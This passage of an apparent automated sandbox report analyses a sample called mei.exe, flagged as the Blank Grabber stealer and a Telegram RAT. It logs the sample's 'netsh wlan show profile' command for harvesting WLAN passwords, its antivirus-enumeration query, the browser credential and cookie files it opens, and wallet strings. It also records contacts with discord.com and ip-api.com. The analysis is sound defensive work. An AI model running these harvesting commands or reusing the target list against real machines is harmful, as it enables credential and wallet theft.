              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313DC410 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6313DC410
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F6220 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6313F6220
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A048CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,89_2_00007FF7D7A048CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2027450507.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2028624518.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1656841633.000001FFF1DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mei.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: Yara matchFile source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2027450507.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2028624518.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1656841633.000001FFF1DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mei.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              Valid Accounts241
              Windows Management Instrumentation              		11
              DLL Side-Loading              		11
              DLL Side-Loading              		4
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
              System Shutdown/Reboot              		Acquire InfrastructureGather Victim Identity Information
              Default Accounts2
              Native API              		12
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol2
              Data from Local System              		Exfiltration Over Bluetooth21
              Encrypted Channel              		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain Accounts212
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager48
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		Automated Exfiltration3
              Non-Application Layer Protocol              		Data Encrypted for ImpactDNS ServerEmail Addresses
              Local Accounts3
              PowerShell              		Login Hook12
              Registry Run Keys / Startup Folder              		11
              Software Packing              		NTDS251
              Security Software Discovery              		Distributed Component Object ModelInput CaptureTraffic Duplication4
              Application Layer Protocol              		Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets2
              Process Discovery              		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              DLL Side-Loading              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Supply Chain CompromisePowerShellCronCron1
              Access Token Manipulation              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
              Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1354458 Sample: mei.exe Startdate: 06/12/2023 Architecture: WINDOWS Score: 100 68 discord.com 2->68 70 ip-api.com 2->70 72 blank-kwj1y.in 2->72 94 Found malware configuration 2->94 96 Antivirus detection for URL or domain 2->96 98 Antivirus detection for dropped file 2->98 100 7 other signatures 2->100 11 mei.exe 62 2->11         started        signatures3 process4 file5 58 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->58 dropped 60 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 11->60 dropped 62 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 11->62 dropped 64 56 other malicious files 11->64 dropped 120 Very long command line found 11->120 122 Drops PE files with a suspicious file extension 11->122 124 Drops PE files to the startup folder 11->124 126 4 other signatures 11->126 15 mei.exe 1 30 11->15         started        signatures6 process7 dnsIp8 74 discord.com 162.159.136.232, 443, 49743 CLOUDFLARENETUS United States 15->74 76 ip-api.com 208.95.112.1, 49734, 49742, 80 TUT-ASUS United States 15->76 54 C:\ProgramData\Microsoft\Windows\...\.scr, PE32+ 15->54 dropped 78 Very long command line found 15->78 80 Found many strings related to Crypto-Wallets (likely being stolen) 15->80 82 Tries to harvest and steal browser information (history, passwords, etc) 15->82 84 4 other signatures 15->84 20 cmd.exe 